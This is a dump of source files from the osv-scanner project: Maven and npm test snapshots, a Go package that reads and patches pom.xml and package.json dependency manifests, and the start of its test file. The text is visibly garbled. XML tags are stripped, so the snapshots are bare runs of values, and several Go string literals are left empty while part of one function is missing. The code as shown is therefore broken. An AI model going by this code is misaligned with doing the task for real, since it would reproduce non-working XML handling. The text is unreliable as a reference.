1.0.0 org.exclude exclude org.example xyz 2.0.0 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.4 org.profile abc 1.2.3 org.profile def ${def.version} profile-two org.import xyz 6.6.6 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.3 --- [TestMavenWrite - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.13.2 ../bin junit junit ${junit.version} test org.example abc 1.0.2 org.example no-version org.example exclusions 1.0.0 org.exclude exclude org.example extra-one 6.6.6 org.example extra-two 9.9.9 org.example xyz 2.0.1 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.5 org.profile abc 1.2.4 org.profile def ${def.version} profile-two org.import xyz 7.0.0 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.4 --- [TestMavenWriteDM - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com org.parent parent-pom 1.2.0 junit junit 4.13.2 org.management abc 1.2.3 org.management xyz 2.3.4 --- ================================================ FILE: internal/resolution/manifest/__snapshots__/npm_test.snap ================================================ [TestNpmWrite - 1] { "name": "npm-manifest", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "cliui": "npm:@isaacs/cliui@^9.0.0", "jquery": "~0.0.1", "lodash": "^4.17.21", "string-width": "^7.1.0", "string-width-aliased": "npm:string-width@^6.1.0" }, "devDependencies": { "eslint": "*" }, "optionalDependencies": { "glob": "^1.0.0" }, "peerDependencies": { "@babel/core": "^7.24.0" } } --- ================================================ FILE: internal/resolution/manifest/manifest.go ================================================ // Package manifest provides functionality for reading and writing manifest files. package manifest import ( "bytes" "fmt" "io" "maps" "os" "path/filepath" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution/depfile" ) type Manifest struct { FilePath string // Path to the manifest file on disk Root resolve.Version // Version representing this package Requirements []resolve.RequirementVersion // All direct requirements, including dev Groups map[RequirementKey][]string // Dependency groups that the imports belong to LocalManifests []Manifest // manifests of local packages EcosystemSpecific any // Any ecosystem-specific information needed } func newManifest() Manifest { return Manifest{ Groups: make(map[RequirementKey][]string), } } func (m Manifest) System() resolve.System { return m.Root.System } func (m Manifest) Clone() Manifest { return Manifest{ FilePath: m.FilePath, Root: m.Root, Requirements: slices.Clone(m.Requirements), Groups: maps.Clone(m.Groups), LocalManifests: slices.Clone(m.LocalManifests), EcosystemSpecific: m.EcosystemSpecific, // TODO: Deep copy this? } } type DependencyPatch struct { Pkg resolve.PackageKey // The package this applies to Type dep.Type // The dependency type OrigRequire string // The original requirement string e.g. "1.*.*" NewRequire string // The new requirement string e.g. "2.*.*" OrigResolved string // The version the original resolves to e.g. "1.2.3" (for display only) NewResolved string // The version the new resolves to e.g. "2.4.6" (for display only) } type Patch struct { Manifest *Manifest // The original manifest Deps []DependencyPatch // Changed direct dependencies EcosystemSpecific any // Any ecosystem-specific information } type ReadWriter interface { // System returns which ecosystem this ReadWriter is for. System() resolve.System // Read parses a manifest file into a Manifest, possibly recursively following references to other local manifest files Read(file depfile.DepFile) (Manifest, error) // Write applies the Patch to the manifest, with minimal changes to the file. // `original` is the original manifest file to read from. The updated manifest is written to `output`. Write(original depfile.DepFile, output io.Writer, patches Patch) error } // Overwrite applies the ManifestPatch to the manifest at filename. // Used so as to not have the same file open for reading and writing at the same time. func Overwrite(rw ReadWriter, filename string, p Patch) error { r, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } var buf bytes.Buffer err = rw.Write(r, &buf, p) r.Close() // Make sure the file is closed before we start writing to it. if err != nil { return err } //nolint:gosec // Complaining about the 0644 permissions. // The file already exists anyway so the permissions don't matter. if err := os.WriteFile(filename, buf.Bytes(), 0644); err != nil { return err } return nil } func GetReadWriter(pathToManifest string, registry string) (ReadWriter, error) { base := filepath.Base(pathToManifest) switch base { case "pom.xml": return NewMavenReadWriter(registry) case "package.json": return NpmReadWriter{}, nil default: return nil, fmt.Errorf("unsupported manifest type: %s", base) } } // A RequirementKey is a comparable type that uniquely identifies a package dependency in a manifest. // It does not include the version specification. type RequirementKey struct { resolve.PackageKey EcosystemSpecific any } func MakeRequirementKey(requirement resolve.RequirementVersion) RequirementKey { switch requirement.System { case resolve.NPM: return npmRequirementKey(requirement) case resolve.Maven: return mavenRequirementKey(requirement) case resolve.UnknownSystem: fallthrough default: return RequirementKey{PackageKey: requirement.PackageKey} } } ================================================ FILE: internal/resolution/manifest/maven.go ================================================ package manifest import ( "bytes" "cmp" "context" "errors" "fmt" "io" "os" "slices" "strings" "deps.dev/util/maven" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/depfile" internalxml "github.com/google/osv-scanner/v2/internal/thirdparty/xml" mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven" ) func mavenRequirementKey(requirement resolve.RequirementVersion) RequirementKey { // Maven dependencies must have unique groupId:artifactId:type:classifier. artifactType, _ := requirement.Type.GetAttr(dep.MavenArtifactType) classifier, _ := requirement.Type.GetAttr(dep.MavenClassifier) return RequirementKey{ PackageKey: requirement.PackageKey, EcosystemSpecific: struct{ ArtifactType, Classifier string }{ ArtifactType: artifactType, Classifier: classifier, }, } } type MavenReadWriter struct { *datasource.MavenRegistryAPIClient } func (MavenReadWriter) System() resolve.System { return resolve.Maven } func NewMavenReadWriter(registry string) (MavenReadWriter, error) { client, err := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: registry, ReleasesEnabled: true}) if err != nil { return MavenReadWriter{}, err } return MavenReadWriter{MavenRegistryAPIClient: client}, nil } type MavenManifestSpecific struct { Parent maven.Parent Properties []PropertyWithOrigin // Properties from the base project OriginalRequirements []DependencyWithOrigin // Dependencies from the base project RequirementsForUpdates []resolve.RequirementVersion // Requirements that we only need for updates Repositories []maven.Repository } type PropertyWithOrigin struct { maven.Property Origin string // Origin indicates where the property comes from } type DependencyWithOrigin struct { maven.Dependency Origin string // Origin indicates where the dependency comes from } func (m MavenReadWriter) Read(df depfile.DepFile) (Manifest, error) { ctx := context.Background() var project maven.Project if err := datasource.NewMavenDecoder(df).Decode(&project); err != nil { return Manifest{}, fmt.Errorf("failed to unmarshal project: %w", err) } properties := buildPropertiesWithOrigins(project, "") origRequirements := buildOriginalRequirements(project, "") var reqsForUpdates []resolve.RequirementVersion if project.Parent.GroupID != "" && project.Parent.ArtifactID != "" { reqsForUpdates = append(reqsForUpdates, resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: project.Parent.Name(), }, // Parent version is a concrete version, but we model parent as dependency here. VersionType: resolve.Requirement, Version: string(project.Parent.Version), }, Type: resolve.MavenDepType(maven.Dependency{Type: "pom"}, mavenutil.OriginParent), }) } // Empty JDK and ActivationOS indicates merging the default profiles. if err := project.MergeProfiles("", maven.ActivationOS{}); err != nil { return Manifest{}, fmt.Errorf("failed to merge profiles: %w", err) } // TODO: there may be properties in repo.Releases.Enabled and repo.Snapshots.Enabled for _, repo := range project.Repositories { if err := m.AddRegistry(datasource.MavenRegistry{ URL: string(repo.URL), ID: string(repo.ID), ReleasesEnabled: repo.Releases.Enabled.Boolean(), SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(), }); err != nil { return Manifest{}, fmt.Errorf("failed to add registry %s: %w", repo.URL, err) } } // Merging parents data by parsing local parent pom.xml or fetching from upstream. if err := mavenutil.MergeParents(ctx, m.MavenRegistryAPIClient, &project, project.Parent, 1, df.Path(), true); err != nil { return Manifest{}, fmt.Errorf("failed to merge parents: %w", err) } // For dependency management imports, the dependencies that imports // dependencies from other projects will be replaced by the imported // dependencies, so add them to requirements first. for _, dmDep := range project.DependencyManagement.Dependencies { if dmDep.Scope == "import" && dmDep.Type == "pom" { reqsForUpdates = append(reqsForUpdates, makeRequirementVersion(dmDep, mavenutil.OriginManagement)) } } // Process the dependencies: // - dedupe dependencies and dependency management // - import dependency management // - fill in missing dependency version requirement project.ProcessDependencies(func(groupID, artifactID, version maven.String) (maven.DependencyManagement, error) { return mavenutil.GetDependencyManagement(ctx, m.MavenRegistryAPIClient, groupID, artifactID, version) }) groups := make(map[RequirementKey][]string) requirements := addRequirements([]resolve.RequirementVersion{}, groups, project.Dependencies, "") requirements = addRequirements(requirements, groups, project.DependencyManagement.Dependencies, mavenutil.OriginManagement) // Requirements may not appear in the dependency graph but needs to be updated. for _, profile := range project.Profiles { reqsForUpdates = addRequirements(reqsForUpdates, groups, profile.Dependencies, "") reqsForUpdates = addRequirements(reqsForUpdates, groups, profile.DependencyManagement.Dependencies, mavenutil.OriginManagement) } for _, plugin := range project.Build.PluginManagement.Plugins { reqsForUpdates = addRequirements(reqsForUpdates, groups, plugin.Dependencies, "") } return Manifest{ FilePath: df.Path(), Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: project.ProjectKey.Name(), }, VersionType: resolve.Concrete, Version: string(project.Version), }, }, Requirements: requirements, Groups: groups, EcosystemSpecific: MavenManifestSpecific{ Parent: project.Parent, Properties: properties, OriginalRequirements: origRequirements, RequirementsForUpdates: reqsForUpdates, Repositories: project.Repositories, }, }, nil } func addRequirements(reqs []resolve.RequirementVersion, groups map[RequirementKey][]string, deps []maven.Dependency, origin string) []resolve.RequirementVersion { for _, d := range deps { reqVer := makeRequirementVersion(d, origin) reqs = append(reqs, reqVer) if d.Scope != "" { reqKey := mavenRequirementKey(reqVer) groups[reqKey] = append(groups[reqKey], string(d.Scope)) } } return reqs } func buildPropertiesWithOrigins(project maven.Project, originPrefix string) []PropertyWithOrigin { count := len(project.Properties.Properties) for _, prof := range project.Profiles { count += len(prof.Properties.Properties) } properties := make([]PropertyWithOrigin, 0, count) for _, prop := range project.Properties.Properties { properties = append(properties, PropertyWithOrigin{Property: prop}) } for _, profile := range project.Profiles { for _, prop := range profile.Properties.Properties { properties = append(properties, PropertyWithOrigin{ Property: prop, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(profile.ID)), }) } } return properties } func buildOriginalRequirements(project maven.Project, originPrefix string) []DependencyWithOrigin { var dependencies []DependencyWithOrigin if project.Parent.GroupID != "" && project.Parent.ArtifactID != "" { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: maven.Dependency{ GroupID: project.Parent.GroupID, ArtifactID: project.Parent.ArtifactID, Version: project.Parent.Version, Type: "pom", }, Origin: mavenOrigin(originPrefix, mavenutil.OriginParent), }) } for _, d := range project.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{Dependency: d, Origin: originPrefix}) } for _, d := range project.DependencyManagement.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginManagement), }) } for _, prof := range project.Profiles { for _, d := range prof.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(prof.ID)), }) } for _, d := range prof.DependencyManagement.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(prof.ID), mavenutil.OriginManagement), }) } } for _, plugin := range project.Build.PluginManagement.Plugins { for _, d := range plugin.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginPlugin, plugin.Name()), }) } } return dependencies } // For dependencies in profiles and plugins, we use origin to indicate where they are from. // The origin is in the format prefix@identifier[@postfix] (where @ is the separator): // - prefix indicates it is from profile or plugin // - identifier to locate the profile/plugin which is profile ID or plugin name // - (optional) suffix indicates if this is a dependency management func makeRequirementVersion(dependency maven.Dependency, origin string) resolve.RequirementVersion { // Treat test & optional dependencies as regular dependencies to force the resolver to resolve them. if dependency.Scope == "test" { dependency.Scope = "" } dependency.Optional = "" return resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: dependency.Name(), }, VersionType: resolve.Requirement, Version: string(dependency.Version), }, Type: resolve.MavenDepType(dependency, origin), } } func mavenOrigin(list ...string) string { result := "" for _, str := range list { if result != "" && str != "" { result += "@" } if str != "" { result += str } } return result } func (MavenReadWriter) Write(df depfile.DepFile, w io.Writer, patch Patch) error { specific, ok := patch.Manifest.EcosystemSpecific.(MavenManifestSpecific) if !ok { return errors.New("invalid MavenManifestSpecific data") } // Walk through local parent pom.xml for original dependencies and properties. // TODO: investigate if this can be done when merging parents in manifest reading currentPath := df.Path() parent := specific.Parent visited := make(map[maven.ProjectKey]bool, mavenutil.MaxParent) for range mavenutil.MaxParent { if parent.GroupID == "" || parent.ArtifactID == "" || parent.Version == "" { break } if visited[parent.ProjectKey] { // A cycle of parents is detected return errors.New("a cycle of parents is detected") } visited[parent.ProjectKey] = true currentPath = mavenutil.ParentPOMPath(currentPath, string(parent.RelativePath)) if currentPath == "" { // No more local parent pom.xml exists. break } f, err := os.Open(currentPath) if err != nil { return fmt.Errorf("failed to open parent file %s: %w", currentPath, err) } var proj maven.Project err = datasource.NewMavenDecoder(f).Decode(&proj) f.Close() if err != nil { return fmt.Errorf("failed to unmarshal project: %w", err) } if mavenutil.ProjectKey(proj) != parent.ProjectKey || proj.Packaging != "pom" { // This is not the project that we are looking for, we should fetch from upstream // that we don't have write access so we give up here. break } origin := mavenOrigin(mavenutil.OriginParent, currentPath) specific.OriginalRequirements = append(specific.OriginalRequirements, buildOriginalRequirements(proj, origin)...) specific.Properties = append(specific.Properties, buildPropertiesWithOrigins(proj, origin)...) parent = proj.Parent } allPatches, err := buildPatches(patch.Deps, specific) if err != nil { return err } for path, patches := range allPatches { if path == "" { // Base pom.xml is going to be written later. continue } // TODO: investigate how to test parent manifests are updated. depFile, err := depfile.OpenLocalDepFile(path) if err != nil { return err } in := new(bytes.Buffer) if _, err := in.ReadFrom(depFile); err != nil { return fmt.Errorf("failed to read from DepFile: %w", err) } depFile.Close() // Make sure the file is closed before we start writing to it. out := new(bytes.Buffer) if err := write(in.String(), out, patches); err != nil { return err } //nolint:gosec if err := os.WriteFile(path, out.Bytes(), 0644); err != nil { return err } } in := new(bytes.Buffer) if _, err := in.ReadFrom(df); err != nil { return fmt.Errorf("failed to read from DepFile: %w", err) } return write(in.String(), w, allPatches[""]) } type MavenPatches struct { DependencyPatches MavenDependencyPatches PropertyPatches MavenPropertyPatches } type MavenPatch struct { maven.DependencyKey NewRequire string } // MavenDependencyPatches represent the dependencies to be updated, which // is a map of dependency patches of each origin. type MavenDependencyPatches map[string]map[MavenPatch]bool // origin -> patch -> whether from this project // addPatch adds a patch to the patches map indexed by origin. // exist indicates whether this patch comes from the project. func (m MavenDependencyPatches) addPatch(changedDep DependencyPatch, exist bool) error { d, o, err := resolve.MavenDepTypeToDependency(changedDep.Type) if err != nil { return fmt.Errorf("MavenDepTypeToDependency: %w", err) } // If this dependency did not already exist in the project, we want to add it to the dependencyManagement section if !exist { o = mavenutil.OriginManagement } substrings := strings.Split(changedDep.Pkg.Name, ":") if len(substrings) != 2 { return fmt.Errorf("invalid Maven name: %s", changedDep.Pkg.Name) } d.GroupID = maven.String(substrings[0]) d.ArtifactID = maven.String(substrings[1]) if _, ok := m[o]; !ok { m[o] = make(map[MavenPatch]bool) } m[o][MavenPatch{ DependencyKey: d.Key(), NewRequire: changedDep.NewRequire, }] = exist return nil } // MavenPropertyPatches represent the properties to be updated, which // is a map of properties of each origin. type MavenPropertyPatches map[string]map[string]string // origin -> tag -> value // parentPathFromOrigin returns the parent path embedded in origin, // as well as the remaining origin string. func parentPathFromOrigin(origin string) (string, string) { tokens := strings.Split(origin, "@") if len(tokens) <= 1 { return "", origin } if tokens[0] != mavenutil.OriginParent { return "", origin } return tokens[1], strings.Join(tokens[2:], "") } // buildPatches returns dependency patches ready for updates. func buildPatches(patches []DependencyPatch, specific MavenManifestSpecific) (map[string]MavenPatches, error) { result := make(map[string]MavenPatches) for _, patch := range patches { var path string origDep := originalDependency(patch, specific.OriginalRequirements) path, origDep.Origin = parentPathFromOrigin(origDep.Origin) if _, ok := result[path]; !ok { result[path] = MavenPatches{ DependencyPatches: MavenDependencyPatches{}, PropertyPatches: MavenPropertyPatches{}, } } if origDep.Name() == ":" { // An empty name indicates the dependency is not found, so the original dependency is not in the base project. // If the patch is from suggest (origRequire is set), we ignore this patch. // If the patch is from override (origRequire is empty), we add this patch. if patch.OrigRequire == "" { if err := result[path].DependencyPatches.addPatch(patch, false); err != nil { return nil, err } } continue } patch.Type = resolve.MavenDepType(origDep.Dependency, origDep.Origin) if !origDep.Version.ContainsProperty() { // The original requirement does not contain a property placeholder. if err := result[path].DependencyPatches.addPatch(patch, true); err != nil { return nil, err } continue } properties, ok := generatePropertyPatches(string(origDep.Version), patch.NewRequire) if !ok { // Not able to update properties to update the requirement. // Update the dependency directly instead. if err := result[path].DependencyPatches.addPatch(patch, true); err != nil { return nil, err } continue } depOrigin := origDep.Origin if strings.HasPrefix(depOrigin, mavenutil.OriginProfile) { // Dependency management is not indicated in property origin. depOrigin, _ = strings.CutSuffix(depOrigin, "@"+mavenutil.OriginManagement) } else { // Properties are defined either universally or in a profile. For property // origin not starting with 'profile', this is an universal property. depOrigin = "" } for name, value := range properties { // A dependency in a profile may contain properties from this profile or // properties universally defined. We need to figure out the origin of these // properties. If a property is defined both universally and in the profile, // we use the profile's origin. propertyOrigin := "" for _, p := range specific.Properties { if p.Name == name && p.Origin != "" && p.Origin == depOrigin { propertyOrigin = depOrigin } } if _, ok := result[path].PropertyPatches[propertyOrigin]; !ok { result[path].PropertyPatches[propertyOrigin] = make(map[string]string) } // This property has been set to update to a value. If both values are the // same, we do nothing; otherwise, instead of updating the property, we // should update the dependency directly. if preset, ok := result[path].PropertyPatches[propertyOrigin][name]; !ok { result[path].PropertyPatches[propertyOrigin][name] = value } else if preset != value { if err := result[path].DependencyPatches.addPatch(patch, true); err != nil { return nil, err } } } } return result, nil } // originalDependency returns the original dependency of a dependency patch. // If the dependency is not found in any local pom.xml, an empty dependency is returned. func originalDependency(patch DependencyPatch, origDeps []DependencyWithOrigin) DependencyWithOrigin { IDs := strings.Split(patch.Pkg.Name, ":") if len(IDs) != 2 { return DependencyWithOrigin{} } dependency, _, _ := resolve.MavenDepTypeToDependency(patch.Type) dependency.GroupID = maven.String(IDs[0]) dependency.ArtifactID = maven.String(IDs[1]) for _, d := range origDeps { if d.Key() == dependency.Key() && d.Version != "" { // If the version is empty, keep looking until we find some non-empty requirement. return d } } return DependencyWithOrigin{} } // generatePropertyPatches returns whether we are able to assign values to // placeholder keys to convert s1 to s2, as well as the generated patches. // s1 contains property placeholders like '${name}' and s2 is the target string. func generatePropertyPatches(s1, s2 string) (map[string]string, bool) { patches := make(map[string]string) ok := generatePropertyPatchesAux(s1, s2, patches) return patches, ok } // generatePropertyPatchesAux generates property patches and store them in patches. // TODO: property may refer to another property ${${name}.version} func generatePropertyPatchesAux(s1, s2 string, patches map[string]string) bool { start := strings.Index(s1, "${") if s1[:start] != s2[:start] { // Cannot update property to match the prefix return false } end := strings.Index(s1, "}") next := strings.Index(s1[end+1:], "${") if next < 0 { // There are no more placeholders. remainder := s1[end+1:] if remainder == s2[len(s2)-len(remainder):] { patches[s1[start+2:end]] = s2[start : len(s2)-len(remainder)] return true } } else if match := strings.Index(s2[start:], s1[end+1:end+1+next]); match > 0 { // Try to match the substring between two property placeholders. patches[s1[start+2:end]] = s2[start : start+match] return generatePropertyPatchesAux(s1[end+1:], s2[start+match:], patches) } return false } func projectStartElement(raw string) string { start := strings.Index(raw, "") if end < 0 { return "" } return raw[start : start+end+1] } // Only for writing dependencies that are not from the base project. type dependencyManagement struct { Dependencies []dependency `xml:"dependencies>dependency,omitempty"` } type dependency struct { GroupID string `xml:"groupId,omitempty"` ArtifactID string `xml:"artifactId,omitempty"` Version string `xml:"version,omitempty"` Type string `xml:"type,omitempty"` Classifier string `xml:"classifier,omitempty"` } func makeDependency(patch MavenPatch) dependency { d := dependency{ GroupID: string(patch.GroupID), ArtifactID: string(patch.ArtifactID), Version: patch.NewRequire, Classifier: string(patch.Classifier), } if patch.Type != "" && patch.Type != "jar" { d.Type = string(patch.Type) } return d } func compareDependency(d1, d2 dependency) int { if i := cmp.Compare(d1.GroupID, d2.GroupID); i != 0 { return i } if i := cmp.Compare(d1.ArtifactID, d2.ArtifactID); i != 0 { return i } if i := cmp.Compare(d1.Type, d2.Type); i != 0 { return i } if i := cmp.Compare(d1.Classifier, d2.Classifier); i != 0 { return i } return cmp.Compare(d1.Version, d2.Version) } func write(raw string, w io.Writer, patches MavenPatches) error { dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw))) enc := internalxml.NewEncoder(w) for { token, err := dec.Token() if errors.Is(err, io.EOF) { break } if err != nil { return fmt.Errorf("getting token: %w", err) } if tt, ok := token.(internalxml.StartElement); ok { if tt.Name.Local == "project" { type RawProject struct { InnerXML string `xml:",innerxml"` } var rawProj RawProject if err := dec.DecodeElement(&rawProj, &tt); err != nil { return err } // xml.EncodeToken writes a start element with its all name spaces. // It's very common to have a start project element with a few name spaces in Maven. // Thus this would cause a big diff when we try to encode the start element of project. // We first capture the raw start element string and write it. projectStart := projectStartElement(raw) if projectStart == "" { return errors.New("unable to get start element of project") } if _, err := w.Write([]byte(projectStart)); err != nil { return fmt.Errorf("writing start element of project: %w", err) } // Then we update the project by passing the innerXML and name spaces are not passed. updated := make(map[string]bool) // origin -> updated if err := writeProject(w, enc, rawProj.InnerXML, "", "", patches.DependencyPatches, patches.PropertyPatches, updated); err != nil { return fmt.Errorf("updating project: %w", err) } // Check whether dependency management is updated, if not, add a new section of dependency management. if dmPatches := patches.DependencyPatches[mavenutil.OriginManagement]; len(dmPatches) > 0 && !updated[mavenutil.OriginManagement] { enc.Indent(" ", " ") var dm dependencyManagement for p := range dmPatches { dm.Dependencies = append(dm.Dependencies, makeDependency(p)) } // Sort dependency management for consistency in testing. slices.SortFunc(dm.Dependencies, compareDependency) if err := enc.Encode(dm); err != nil { return err } if _, err := w.Write([]byte("\n\n")); err != nil { return err } enc.Indent("", "") } // Finally we write the end element of project. if _, err := w.Write([]byte("")); err != nil { return fmt.Errorf("writing start element of project: %w", err) } continue } } if err := enc.EncodeToken(token); err != nil { return err } if err := enc.Flush(); err != nil { return err } } return nil } func writeProject(w io.Writer, enc *internalxml.Encoder, raw, prefix, id string, patches MavenDependencyPatches, properties MavenPropertyPatches, updated map[string]bool) error { dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw))) for { token, err := dec.Token() if errors.Is(err, io.EOF) { break } if err != nil { return err } if tt, ok := token.(internalxml.StartElement); ok { switch tt.Name.Local { case "parent": updated["parent"] = true type RawParent struct { maven.ProjectKey InnerXML string `xml:",innerxml"` } var rawParent RawParent if err := dec.DecodeElement(&rawParent, &tt); err != nil { return err } req := string(rawParent.Version) if parentPatches, ok := patches["parent"]; ok { // There should only be one parent patch if len(parentPatches) > 1 { return fmt.Errorf("multiple parent patches: %v", parentPatches) } for k := range parentPatches { req = k.NewRequire } } if err := writeString(enc, ""+rawParent.InnerXML+"", map[string]string{"version": req}); err != nil { return fmt.Errorf("updating parent: %w", err) } continue case "properties": type RawProperties struct { InnerXML string `xml:",innerxml"` } var rawProperties RawProperties if err := dec.DecodeElement(&rawProperties, &tt); err != nil { return err } if err := writeString(enc, ""+rawProperties.InnerXML+"", properties[mavenOrigin(prefix, id)]); err != nil { return fmt.Errorf("updating properties: %w", err) } continue case "profile": if prefix != "" || id != "" { // Skip updating if prefix or id is set to avoid infinite recursion break } type RawProfile struct { maven.Profile InnerXML string `xml:",innerxml"` } var rawProfile RawProfile if err := dec.DecodeElement(&rawProfile, &tt); err != nil { return err } if err := writeProject(w, enc, ""+rawProfile.InnerXML+"", mavenutil.OriginProfile, string(rawProfile.ID), patches, properties, updated); err != nil { return fmt.Errorf("updating profile: %w", err) } continue case "plugin": if prefix != "" || id != "" { // Skip updating if prefix or id is set to avoid infinite recursion break } type RawPlugin struct { maven.Plugin InnerXML string `xml:",innerxml"` } var rawPlugin RawPlugin if err := dec.DecodeElement(&rawPlugin, &tt); err != nil { return err } if err := writeProject(w, enc, ""+rawPlugin.InnerXML+"", mavenutil.OriginPlugin, rawPlugin.Name(), patches, properties, updated); err != nil { return fmt.Errorf("updating profile: %w", err) } continue case "dependencyManagement": type RawDependencyManagement struct { maven.DependencyManagement InnerXML string `xml:",innerxml"` } var rawDepMgmt RawDependencyManagement if err := dec.DecodeElement(&rawDepMgmt, &tt); err != nil { return err } o := mavenOrigin(prefix, id, mavenutil.OriginManagement) updated[o] = true dmPatches := patches[o] if err := writeDependency(w, enc, ""+rawDepMgmt.InnerXML+"", dmPatches); err != nil { return fmt.Errorf("updating dependency management: %w", err) } continue case "dependencies": type RawDependencies struct { Dependencies []maven.Dependency `xml:"dependencies"` InnerXML string `xml:",innerxml"` } var rawDeps RawDependencies if err := dec.DecodeElement(&rawDeps, &tt); err != nil { return err } o := mavenOrigin(prefix, id) updated[o] = true depPatches := patches[o] if err := writeDependency(w, enc, ""+rawDeps.InnerXML+"", depPatches); err != nil { return fmt.Errorf("updating dependencies: %w", err) } continue } } if err := enc.EncodeToken(token); err != nil { return err } } return enc.Flush() } // indentation returns the indentation of the dependency element. // If dependencies or dependency elements are not found, the default // indentation (four space) is returned. func indentation(raw string) string { i := strings.Index(raw, "") if i < 0 { return " " } raw = raw[i+len(""):] // Find the first dependency element. j := strings.Index(raw, "") if j < 0 { return " " } raw = raw[:j] // Find the last new line and get the space between. k := strings.LastIndex(raw, "\n") if k < 0 { return " " } return raw[k+1:] } func writeDependency(w io.Writer, enc *internalxml.Encoder, raw string, patches map[MavenPatch]bool) error { dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw))) for { token, err := dec.Token() if errors.Is(err, io.EOF) { break } if err != nil { return err } if tt, ok := token.(internalxml.StartElement); ok { if tt.Name.Local == "dependencies" { // We still need to write the start element if err := enc.EncodeToken(token); err != nil { return err } if err := enc.Flush(); err != nil { return err } // Write patches that are not in the base project. var deps []dependency for p, ok := range patches { if !ok { deps = append(deps, makeDependency(p)) } } if len(deps) == 0 { // No dependencies to add continue } // Sort dependencies for consistency in testing. slices.SortFunc(deps, compareDependency) enc.Indent(indentation(raw), " ") // Write a new line to keep the format. if _, err := w.Write([]byte("\n")); err != nil { return err } for _, d := range deps { if err := enc.Encode(d); err != nil { return err } } enc.Indent("", "") continue } if tt.Name.Local == "dependency" { type RawDependency struct { maven.Dependency InnerXML string `xml:",innerxml"` } var rawDep RawDependency if err := dec.DecodeElement(&rawDep, &tt); err != nil { return err } req := string(rawDep.Version) for patch := range patches { // A Maven dependency key consists of Type and Classifier together with GroupID and ArtifactID. if patch.DependencyKey == rawDep.Key() { req = patch.NewRequire } } // xml.EncodeElement writes all empty elements and may not follow the existing format. // Passing the innerXML can help to keep the original format. if err := writeString(enc, ""+rawDep.InnerXML+"", map[string]string{"version": req}); err != nil { return fmt.Errorf("updating dependency: %w", err) } continue } } if err := enc.EncodeToken(token); err != nil { return err } } return enc.Flush() } // writeString writes XML string specified by raw with replacements specified in values. func writeString(enc *internalxml.Encoder, raw string, values map[string]string) error { dec := internalxml.NewDecoder(bytes.NewReader([]byte(raw))) for { token, err := dec.Token() if errors.Is(err, io.EOF) { break } if err != nil { return err } if tt, ok := token.(internalxml.StartElement); ok { if value, ok2 := values[tt.Name.Local]; ok2 { var str string if err := dec.DecodeElement(&str, &tt); err != nil { return err } if err := enc.EncodeElement(value, tt); err != nil { return err } continue } } if err := enc.EncodeToken(token); err != nil { return err } } return enc.Flush() } ================================================ FILE: internal/resolution/manifest/maven_test.go ================================================ package manifest import ( "bytes" "path/filepath" "reflect" "strings" "testing" "deps.dev/util/maven" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/go-cmp/cmp" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/testutility" ) var ( depMgmt = depTypeWithOrigin("management") depParent = depTypeWithOrigin("parent") depPlugin = depTypeWithOrigin("plugin@org.plugin:plugin") depProfileOne = depTypeWithOrigin("profile@profile-one") depProfileTwoMgmt = depTypeWithOrigin("profile@profile-two@management") ) func depTypeWithOrigin(origin string) dep.Type { var result dep.Type result.AddAttr(dep.MavenDependencyOrigin, origin) return result } func mavenReqKey(t *testing.T, name, artifactType, classifier string) RequirementKey { t.Helper() var typ dep.Type if artifactType != "" { typ.AddAttr(dep.MavenArtifactType, artifactType) } if classifier != "" { typ.AddAttr(dep.MavenClassifier, classifier) } return MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: name, System: resolve.Maven, }, }, Type: typ, }) } func TestMavenReadWrite(t *testing.T) { t.Parallel() srv := testutility.NewMockHTTPServer(t) srv.SetResponse(t, "org/upstream/parent-pom/1.2.3/parent-pom-1.2.3.pom", []byte(` org.upstream parent-pom 1.2.3 pom bbb 2.2.2 org.example ${bbb.artifact} ${bbb.version} `)) srv.SetResponse(t, "org/import/import/1.0.0/import-1.0.0.pom", []byte(` org.import import 1.0.0 pom 3.3.3 org.example ccc ${ccc.version} `)) cwd := testutility.GetCurrentWorkingDirectory(t) df, err := depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", 